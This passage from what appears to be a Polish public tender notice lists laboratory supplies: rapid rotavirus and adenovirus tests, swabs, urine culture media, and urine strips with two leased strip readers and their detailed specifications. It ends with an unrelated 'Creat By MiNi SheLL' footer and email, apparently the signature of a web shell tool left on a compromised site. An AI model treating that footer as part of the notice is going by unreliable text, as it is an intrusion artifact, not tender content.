<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Test do wykrywania rotawirusów i adenowirusów. Kasetkowy, jakościowy test immunochromatograficzny. Jednoczesne wykrycie rotawirusów i adenowirusów. Kasetki pakowane pojedynczo. Czas otrzymania wyniku do 15 minut. Wewnętrzna kontrola zawarta w teście - 800 szt.
2. Wymazówka plastikowa w probówce z podłożem Stuart, sterylna, pojedynczo pakowana - 7 200 szt.
3. Pożywki do posiewu moczu, dwupodłożowe: agar C.L.E.D. , oraz agar Mac Conkeya - 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Dostawa pasków do badań fizykochemicznych i sprzętu do analizy osadu moczu wraz z dzierżawą dwóch czytników do moczu dla laboratorium w Oleśnicy i w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Paski 10-cio parametrowe	35 000 ozn.
2.	Paski do mikroalbuminurii	250 ozn.
3.	Mocz kontrolny na 2 poziomach	
4.	Kamery z 10 komorami z siatką pomiarową do osadu moczu	3 500 szt.
5.	Probówki do wirowania moczu z PS 17x150 mm, poj. 12 ml z wgłębieniem na 0,5 ml osadu	35 000 szt.
Ilości pasków Wykonawca powinien powiększyć o ilość potrzebną do wykonania codziennej kontroli na dwóch poziomach.
Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość i zaokrąglając w górę do pełnego opakowania.
Wymagane parametry czytnika pasków do moczu:
1.Dwa czytniki fabrycznie nowe, rok prod. 2012/2013
2.Obsługa czytników za pomocą wyświetlacza dotykowego o rozdzielczości nie mniejszej niż 320x240
3.Wydajność min. : tryb zwykły-60 pasków/godz.,; tryb szybki 240 pasków/godz.
4.Wbudowane czasomierze inkubacji pasków, z czasem odczytu po 60 sek.
5.Praca w trybie zwykłym-inkubacja pasków w aparacie z kontrolowanym czasem odczytu po 60 sek.
6.Praca w trybie szybkim-inkubacja pasków poza aparatem, czas inkubacji poszczególnych pasków kontrolowany za pomocą niezależnych czasomierzy w czytniku z odczytem po 60 sek.
7.Wbudowany czujnik rozpoznający obecność paska na podajniku i jego prawidłowe ułożenie
8.Automatyczne uruchamianie inkubacji/pomiaru po wykryciu paska na podajniku
9.Automatyczna kalibracja bez konieczności używania pasków kalibracyjnych
10.Czytniki dostarczone z paskami kontrolnymi ze zmianowanym zakresem reflektancji do sprawdzianu optyki
11.Pamięć wyników: min. 240 wraz z wszystkimi wprowadzonymi danymi pacjenta, barwą i klarownością moczu oraz komentarzami
12.Wbudowana drukarka termiczna
13.Wymagane 3 porty: RS-232, USB i PS2
14.Możliwość jednoczesnego podłączenia do czytników skanera kodów kreskowych oraz kabla sieciowego (LIMS)
15.Możliwość pracy czytników na zasilaniu bateryjnym (bateria AA lub AAA)
16.Polskie oprogramowanie czytnika
17.Możliwość jednoczesnego wprowadzenia do czytnika ID pacjenta (cyfry i litery) jak i numeru kolejnego badania
18.Możliwość wprowadzenia ID pacjenta zarówno z poziomu aparatu, klawiatury oraz za pomocą skanera kodów kreskowych
19.Możliwość wpisania przez użytkownika pierwszego numeru kolejnego
20.Możliwość wprowadzenia barwy moczu, definiowanej przez użytkownika
21.Możliwość wprowadzenia klarowności moczu, definiowanej przez użytkownika
22.Wprowadzenie komentarzy dla pacjenta/próbki
23.Wprowadzenie komentarzy przed pomiarem , bezpośrednio po uzyskaniu wyniku i po wyszukaniu wyniku w pamięci
24.Możliwość wybrania przez użytkownika jednostek tradycyjnych, SI i arbitralnych, niezależnie dla każdego parametru (nie dotyczy pH, azotynów i ciężaru właściwego)
Flagowanie wyników patologicznych
25.Wydruk wszystkich wpisanych danych pacjenta/próbki : ID, nr seryjny, barwa i klarowność moczu, komentarze
26.Możliwość ustawienia przez użytkownika kolejności parametrów na wydruku
27.Możliwość zaprogramowania nagłówka wydruku wyników
28.Możliwość przefiltrowania wyników w pamięci aparatu wg: ID pacjenta,numeru kolejnego, wyników dodatnich, wyników nie wydrukowanych oraz daty
29.Możliwość wysłania wyników do LIMS automatycznie lub ręcznie
30.Możliwość wyników do LIMS wybranego/pojedynczego wyniku bezpośrednio po jego uzyskaniu lub przefiltrowaniu z pamięci czytnika
31.	Kompatybilne z czytnikami paski 10-cio parametrowe, wyposażone w pole kompensujące barwę moczu, bez interferencji ze strony kwasu askorbinowego
32.Kompatybilne z czytnikami paski do półilościowego badania albuminy i kreatyniny w moczu
33.Ciekły syntetyczny mocz kontrolny na 2 poziomach w fiolkach min. 15 ml , tego samego producenta co paski i czytniki
34.Wykonawca na swój koszt podłączy czytniki do laboratoryjnej sieci informatycznej e-LAB Eclipse
35.Instrukcja obsługi czytnika dołączona do oferty
36.Instrukcja używania pasków i moczu kontrolnego dołączona do oferty
37.Dołączone do oferty deklaracje zgodności EC na czytnik, paski i mocz kontrolny
Niespełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.12.41.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com